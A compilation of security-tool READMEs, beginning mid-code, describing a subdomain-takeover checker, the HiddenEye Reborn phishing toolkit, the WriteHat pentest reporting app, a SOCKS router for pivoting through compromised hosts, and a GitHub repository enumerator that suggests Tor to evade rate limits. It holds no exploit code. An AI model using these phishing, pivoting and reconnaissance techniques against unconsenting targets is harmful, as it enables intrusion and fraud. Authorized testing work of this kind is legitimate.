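    `results`: iterable of (subdomain, status_code, cname) tuples.
    """
    candidates = []
    for subdomain, status, cname in results:
        if status != 404 or not cname:
            continue
        # Drop records whose CNAME is under the target's own domain.
        if target_domain in cname:
            continue
        candidates.append((subdomain, cname))
    return candidates
```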


Key Features:
- Fast( as it is Asynchronous)
- Uses two more tool to increase efficiency
- Saves result in a text file for future reference
- Umm, that's it, nothing much!

How to use:

Note: Only works on Python3.7+


Using docker

As an alternative, it is also possible to build a Docker image, so no prerequisites are necessary.

$ docker build -t sub404 .
$ docker run --rm sub404 -h

Usage example:

Note: If subfinder and sublist3r are installed.
This combines the results from sublist3r and subfinder and checks for the possibility of takeover.
$ python3 sub404.py -d anydomain.com



- If subfinder and sublist3r are not installed, provide subdomains in a text file
$ python3 sub404.py -f subdomain.txt


Note:

This tool is mostly tested on Linux but should work on other OSes too.


Usage options:
$ python3 sub404.py -h

This will display help for the tool. Here are all the switches it supports.

Flag  Description                                                                               Example
-d    Domain name of the target.                                                                python3 sub404.py -d noobarmy.tech
-f    Provide location of subdomain file to check for takeover if subfinder is not installed.   python3 sub404.py -f subdomain.txt
-p    Set protocol for requests. Default is "http".                                             python3 sub404.py -f subdomain.txt -p https or python3 sub404.py -d noobarmy.tech -p https
-o    Output unique subdomains of sublist3r and subfinder to text file. Default is "uniqueURL.txt"   python3 sub404.py -d noobarmy.tech -o output.txt
-h    Show this help message and exit                                                           python3 sub404.py -h

Note:
This tool fetches the CNAME of URLs with a 404 response code and removes all URLs which have the target domain in the CNAME, so the chance of false positives is high.

Contributing to Sub 404:
- Report bugs, missing best practices
- DM me with new ideas
- Help in Fixing bugs

My Instagram:

Say Hello r3curs1v3_pr0xy


Credits:

Ice3man543 - Projectdiscovery's subfinder tool is used to enumerate subdomains
aboul3la - aboul3la's sublist3r tool is used to enumerate subdomains



HiddenEyeReborn - HiddenEye With Completely New Codebase And Better Features Set



HiddenEye: Reborn is my second try at building a multi-featured tool for exploiting human mistakes. Currently, HE: RE mainly has phishing features, but we are planning to add more. You can follow development progress by looking at (REMIND ME TO DO ROADMAP) or the Projects tab on GitHub.


Disclaimer

The use of HiddenEye: Reborn and/or its resources is the complete responsibility of the end-user. The developers assume no liability and are not responsible for any misuse or damage caused by HiddenEye: Reborn. Some of your actions may be illegal, and you may not use this software to test a person or company without written permission.


Installation

HE: RE is available on PyPI and can be installed using pip:

pip install hiddeneye-reborn

That's all it takes! HE: RE is now available as a terminal command or as a package to your projects.


Documentation

To be written: https://hiddeneye-reborn.readthedocs.io


FAQ

Q: Why is the original HiddenEye no longer maintained?

A: Due to low quality and bad practices used in code.


Q: Is there any example usages for this tool?

A: This is just a tool, and it's up to you how to use it; that's why we take no liability for your actions. There are multiple examples of legal usage of this tool, such as people improving their workflow by testing their employees or colleagues and educating them about the human vulnerabilities social engineers may exploit.





Writehat - A Pentest Reporting Tool Written In Python



WriteHat is a reporting tool which removes Microsoft Word (and many hours of suffering) from the reporting process. Markdown --> HTML --> PDF. Created by penetration testers, for penetration testers - but can be used to generate any kind of report. Written in Django (Python 3).


Features:
  • Effortlessly generate beautiful pentest reports
  • On-the-fly drag-and-drop report builder
  • Markdown support - including code blocks, tables, etc.
  • Crop, annotate, caption, and upload images
  • Customizable report background / footer
  • Assign operators and track statuses for individual report sections
  • Ability to clone and template reports
  • Findings database
  • Supports multiple scoring types (CVSS 3.1, DREAD)
  • Can easily generate multiple reports from the same set of findings
  • Extensible design enables power users to craft highly-customized report sections
  • LDAP integration



Installation Prerequisites:
  • Install docker and docker-compose
    • These can usually be installed using apt, pacman, dnf, etc.
    $ sudo apt install docker.io docker-compose

Deploying WriteHat (The quick and easy way, for testing):

WriteHat can be deployed in a single command:

$ git clone https://github.com/blacklanternsecurity/writehat && cd writehat && docker-compose up

Log in at https://127.0.0.1 (default: admin / PLEASECHANGETHISFORHEAVENSSAKE)


Deploying WriteHat (The right way):
  1. Install Docker and Docker Compose

  2. Clone the WriteHat Repo into /opt

    $ cd /opt
    $ git clone https://github.com/blacklanternsecurity/writehat
    $ cd writehat
  3. Create Secure Passwords in writehat/config/writehat.conf for:

    • MongoDB (also enter in docker-compose.yml)
    • MySQL (also enter in docker-compose.yml)
    • Django (used for encrypting cookies, etc.)
    • Admin user
    Note: Nothing else aside from the passwords needs to be modified if you are using the default configuration.
    Note: Don't forget to lock down the permissions on writehat/config/writehat.conf and docker-compose.yml (chown root:root; chmod 600).
  4. Add Your Desired Hostname to allowed_hosts in writehat/config/writehat.conf

  5. (Optional) Replace the self-signed SSL certificates in nginx/:

    • writehat.crt
    • writehat.key
  6. Test That Everything's Working:

    $ docker-compose up --build

    Note: If using a VPN, you need to be disconnected from the VPN the first time you bring up the services with docker-compose. This is so docker can successfully create the virtual network.

  7. Install and Activate the Systemd Service:

    This will start WriteHat automatically upon boot

    $ sudo cp writehat/config/writehat.service /etc/systemd/system/
    $ sudo systemctl enable writehat --now
  8. Tail the Service Logs:

    $ sudo journalctl -xefu writehat.service
  9. Create Users

    Browse to https://127.0.0.1/admin after logging in with the admin user specified in writehat/config/writehat.conf.
    Note: There are some actions which only an admin can perform (e.g. database backups). An admin user is automatically created from the username and password in writehat/config/writehat.conf, but you can also promote an LDAP user to admin:

    # Enter the app container
    $ docker-compose exec writehat bash

    # Promote the user and exit
    $ ./manage.py ldap_promote <ldap_username>
    $ exit

Terminology

Here are basic explanations for some WriteHat terms which may not be obvious.

Engagement
├─ Customer
├─ Finding Group 1
│ ├─ Finding
│ └─ Finding
├─ Finding Group 2
│ ├─ Finding
│ └─ Finding
├─ Report 1
└─ Report 2
└─ Page Template

Engagement

An Engagement is where content is created for the customer. This is where the work happens - creating reports and entering findings.


Report

A Report is a modular, hierarchical arrangement of Components which can be easily updated via a drag-and-drop interface, then rendered into HTML or PDF. An engagement can have multiple Reports. A Page Template can be used to customize the background and footer. A Report can also be converted into a Report Template.


Report Component

A report Component is a section or module of the report that can be dragged/dropped into place inside the report creator. Examples include "Title Page", "Markdown", "Findings", etc. There are plenty of built-in components, but you can make your own as well. (They're just HTML/CSS + Python, so it's pretty easy. See the guide below)


Report Template

A Report Template can be used as a starting point for a Report (in an Engagement). Reports can also be converted to Report Templates.


Finding Group

A Finding Group is a collection of findings that are scored in the same way (e.g. CVSS or DREAD). You can create multiple finding groups per engagement (e.g. "Technical Findings" and "Treasury Findings"). When inserting findings into the Report (via the "Findings" Component, for example), you need to select which Finding Group to populate that Component with.


Page Template

A Page Template lets you customize report background images and footers. You can set one Page Template as the default, and it will be applied globally unless overridden at the Engagement or Report level.


Writing Custom Report Components



Each report component is made up of the following:

  1. A Python file in writehat/components/
  2. An HTML template in writehat/templates/componentTemplates/
  3. A CSS file in writehat/static/css/component/ (optional)

We recommend referencing the existing files in these directories; they work well as starting points / examples.

A simple custom component would look like this:


components/CustomComponent.py:
from .base import *

class CustomComponentForm(ComponentForm):

    summary = forms.CharField(label='Component Text', widget=forms.Textarea, max_length=50000, required=False)
    field_order = ['name', 'summary', 'pageBreakBefore', 'showTitle']


class Component(BaseComponent):

    default_name = 'Custom Report Component'
    formClass = CustomComponentForm

    # the "templatable" attribute decides whether or not that field
    # gets saved if the report is ever converted into a template
    fieldList = {
        'summary': StringField(markdown=True, templatable=True),
    }

    # make sure to specify the HTML template
    htmlTemplate = 'componentTemplates/CustomComponent.html'

    # Font Awesome icon type + color (HTML/CSS)
    # This is just eye candy in the web app
    iconType = 'fas fa-stream'
    iconColor = 'var(--blue)'

    # the "preprocess" function is executed when the report is rendered
    # use this to perform any last-minute operations on its data
    def preprocess(self, context):

        # for example, to uppercase the entire "summary" field:
        # context['summary'] = context['summary'].upper()
        return context

Note that fields must share the same name in both the component class and its form. All components must either inherit from BaseComponent or another component. Additionally, each component has built-in fields for name, pageBreakBefore (whether to start on a new page), and showTitle (whether or not to display the name field as a header). So it's not necessary to add those.


componentTemplates/CustomComponent.html:

Fields from the Python module are automatically added to the template context. In this example, we want to render the summary field as markdown, so we add the markdown tag in front of it. Note that you can also access engagement and report-level variables, such as report.name, report.findings, engagement.customer.name, etc.

{% load custom_tags %}
<section class="l{{ level }} component{% if pageBreakBefore %} page-break{% endif %}" id="container_{{ id }}">
  {% include 'componentTemplates/Heading.html' %}
  <div class='markdown-align-justify custom-component-summary'>
    <p>
      {% markdown summary %}
    </p>
  </div>
</section>

componentTemplates/CustomComponent.css (optional):

The filename must match that of the Python file (but with a .css extension instead of .py). It is loaded automatically when the report is rendered.

div.custom-component-summary {
    font-weight: bold;
}

Once the above files are created, simply restart the web app and the new component will populate automatically.

$ docker-compose restart writehat

Manual DB Update/Migration

If an update is pushed that changes the database schema, Django database migrations are executed automatically when the container is restarted. However, user interaction may sometimes be required. To apply Django migrations manually:

  1. Stop WriteHat (systemctl stop writehat)
  2. cd into the WriteHat directory (/opt/writehat)
  3. Start the docker container
$ docker-compose run writehat bash
  4. Once in the container, apply the migrations as usual:
$ ./manage.py makemigrations
$ ./manage.py migrate
$ exit
  5. Bring down the docker containers and restart the service
$ docker-compose down
$ systemctl start writehat

Manual DB Backup/Restore

Note that there is already in-app functionality for this in the /admin page of the web app. You can use this method if you want to make a file-level backup job via cron, etc.

  1. On the destination system:
    • Follow normal installation steps
    • Stop WriteHat (systemctl stop writehat)
  2. On the source system:
    • Stop WriteHat (systemctl stop writehat)
  3. TAR up the mysql, mongo, and writehat/migrations directories and copy the archive to the destination system (same location):
# MUST RUN AS ROOT
$ sudo tar --same-owner -cvzpf db_backup.tar.gz mongo mysql writehat/migrations
  4. On the destination system, make a backup of the migrations directory
$ mv writehat/migrations writehat/migrations.bak
  5. Extract the TAR archive on the destination
$ sudo tar --same-owner -xvpzf db_backup.tar.gz
  6. Start WriteHat on the new system
$ systemctl start writehat

Roadmap / Potential Future Developments:
  • Change tracking and revisions
  • More in-depth review/feedback functionality
  • Collaborative multi-user editing similar to Google Docs
  • JSON export feature
  • Presentation slide generation
  • More advanced table creator with CSV upload feature
  • More granular permissions / ACLs (beyond just user + admin roles)

Known Bugs / Limitations:
  • Chrome or Chromium is the recommended browser. Others are untested and may experience bugs.
  • "Assignee" field on report components only works with LDAP users, not local ones.
  • Annotations on images sometimes jump slightly when applied. It's a known bug that we're tracking with the JS library: https://github.com/ailon/markerjs/issues/40
  • Visual bugs appear occasionally on page breaks. These can be fixed by manually inserting a page break in the affected markdown (there's a button for it in the editor).


Go-RouterSocks - Router Sock. One Port Socks For All The Others.


The next step after compromising a machine is to enumerate the network behind. Many tools exist to expose a socks port on the attacker's machine and send all the traffic through a tunnel to the compromised machine. When several socks ports are available, we have to manage different proxychains configuration to choose the targeted network. This tool will expose one socks port and route the traffic through the configured path.

The idea came after using chisel. Chisel is really helpful, but it can get hard to manage many clients, as it opens a new socks port for each new client in reverse mode.
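The underlying routing idea, matching the destination address against the configured CIDRs and handing the connection to the corresponding upstream socks server, can be sketched like this (a simplified illustration, not the tool's actual code):

```python
import ipaddress

class RouteTable:
    """Map CIDR prefixes to upstream SOCKS endpoints, most specific first."""

    def __init__(self):
        self.routes = []  # (network, upstream) pairs

    def add(self, cidr: str, upstream: str):
        self.routes.append((ipaddress.ip_network(cidr), upstream))
        # Keep longest prefixes first so the most specific route wins.
        self.routes.sort(key=lambda r: r[0].prefixlen, reverse=True)

    def lookup(self, dest_ip: str):
        addr = ipaddress.ip_address(dest_ip)
        for network, upstream in self.routes:
            if addr in network:
                return upstream
        return None  # no route configured: refuse the connection
```

With this table, a single exposed socks port can dispatch 192.168.1.0/24 traffic to one compromised host's tunnel and 192.168.2.0/24 to another, with a single proxychains configuration on the attacker's side.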


Usage

Start the socks server:

Usage:
rsocks [flags]

Flags:
-h, --help help for rsocks
-i, --ip string IP for socks5 server (default "0.0.0.0")
-p, --port int Socks5 port (default 1080)

Define the routes:

RouterSocks> help
route: Manage route to socks servers
chisel: Liste chisel socks server on localhost
help: help command
RouterSocks> route add 192.168.1.0/24 10.0.0.1:1081
[*] Successfull route added
RouterSocks> chisel
[0] 127.0.0.1:1081
RouterSocks> route add 192.168.2.0/24 0
[*] Successfull route added
RouterSocks> route
192.168.1.0/24 => 10.0.0.1:1081
192.168.2.0/24 => 127.0.0.1:1081

Features
  • Route network through remote or local socks server
  • Use chisel session ID


Gitls - Enumerate Git Repository URL From List Of URL / User / Org



Enumerate git repository URL from list of URL / User / Org. Friendly to pipeline

This tool is useful when a repository host, such as GitHub, is included in the bug bounty scope. Sometimes the target is specified as an org or user name rather than a specific repository; you can use this tool to extract the URLs of all public repositories included in that org/user.


This can be used for various actions such as scanning or cloning for multiple repositories.

NOTICE
For unauthenticated requests to the GitHub API, the rate limit allows up to 60 requests per hour. Unauthenticated requests are associated with the originating IP address, not the user making the requests. https://docs.github.com/en/rest/overview/resources-in-the-rest-api

So with too many requests you can be blocked by GitHub's API for a certain time. In this case, you can pick an appropriate source address, or access the API from any IP using torsocks (e.g. torsocks gitls -l user.list) or the -tor option.
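The expansion step gitls performs can be sketched as follows: a URL that already names an owner and a repository passes through unchanged, while a bare user/org URL has to be expanded through the (rate-limited) API. This classifier is an illustration, not gitls' actual code:

```python
from urllib.parse import urlparse

def classify(url: str):
    """Split a github.com URL into ('repo', url) or ('account', name).
    Account entries still need expansion through the GitHub API,
    which is where the 60 requests/hour limit above bites."""
    path = [p for p in urlparse(url).path.split("/") if p]
    if len(path) >= 2:
        return ("repo", url)       # owner/repo: already a repository URL
    return ("account", path[0])    # bare user or org: must be expanded
```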

Installation

From go-get
▶ GO111MODULE=on go get -v github.com/hahwul/gitls

Using homebrew
▶ brew tap hahwul/gitls
▶ brew install gitls

Using snapcraft
▶ sudo snap install gitls

Usage
Usage of gitls:
-include-users
include repo of org users(member)
-l string
List of targets (e.g -l sample.lst)
-o string
write output file (optional)
-proxy string
using custom proxy
-tor
using tor proxy / localhost:9050
-version
version of gitls

Case Study

Make all repo urls from repo/org/user urls

sample.lst

https://github.com/hahwul
https://github.com/tomnomnom/gron
https://github.com/tomnomnom/httprobe
https://github.com/s0md3v

make repo url list from sample file

▶ gitls -l sample.lst
https://github.com/hahwul/a2sv
https://github.com/hahwul/action-dalfox
https://github.com/hahwul/asset-of-hahwul.com
https://github.com/hahwul/awesome-zap-extensions
https://github.com/hahwul/backbomb
https://github.com/hahwul/booungJS
https://github.com/hahwul/buildpack-nmap
https://github.com/hahwul/buildpack-zap-daemon
https://github.com/hahwul/can-i-protect-xss
https://github.com/hahwul/cyan-snake
https://github.com/hahwul/dalfox
https://github.com/hahwul/DevSecOps
https://github.com/hahwul/droid-hunter
https://github.com/hahwul/exploit-db_to_dokuwiki
https://github.com/hahwul/ftc
https://github.com/hahwul/gitls
https://github.com/hahwul/go-github-selfupdate-patched
https://github.com/hahwul/hack-pet
...snip...
https://github.com/hahwul/zap-cloud-scan
https://github.com/tomnomnom/gron
https://github.com/tomnomnom/httprobe
https://github.com/s0md3v/Arjun
https://github.com/s0md3v/AwesomeXSS
https://github.com/s0md3v/Blazy
https://github.com/s0md3v/Bolt
...snip...
https://github.com/s0md3v/velocity
https://github.com/s0md3v/XSStrike
https://github.com/s0md3v/Zen
https://github.com/s0md3v/zetanize

Get all repository in org and included users(members)
▶ echo https://github.com/paypal | ./gitls -include-users
....
https://github.com/paypal/tech-talks
https://github.com/paypal/TLS-update
https://github.com/paypal/yurita
https://github.com/ahunnargikar
https://github.com/ahunnargikar/docker-chronos-image
https://github.com/ahunnargikar/docker-tomcat7
https://github.com/ahunnargikar/DockerConDemo
https://github.com/ahunnargikar/elasticsearch-registry-backend
https://github.com/ahunnargikar/elasticsearchindex
https://github.com/ahunnargikar/jenkins-dind
https://github.com/ahunnargikar/jenkins-standalone
https://github.com/ahunnargikar/vagrant-mesos
https://github.com/ahunnargikar/vagrant_docker_registry
https://github.com/anandpalanisamy
https://github.com/anilgursel
https://github.com/anilgursel/squbs-sample
https://github.com/bluepnume

Automated testing with gitleaks
▶ gitls -l sample.lst | xargs -I % gitleaks --repo-url=% -v

All clone target's repo
▶ echo "https://github.com/paypal" | gitls | xargs -I % git clone %


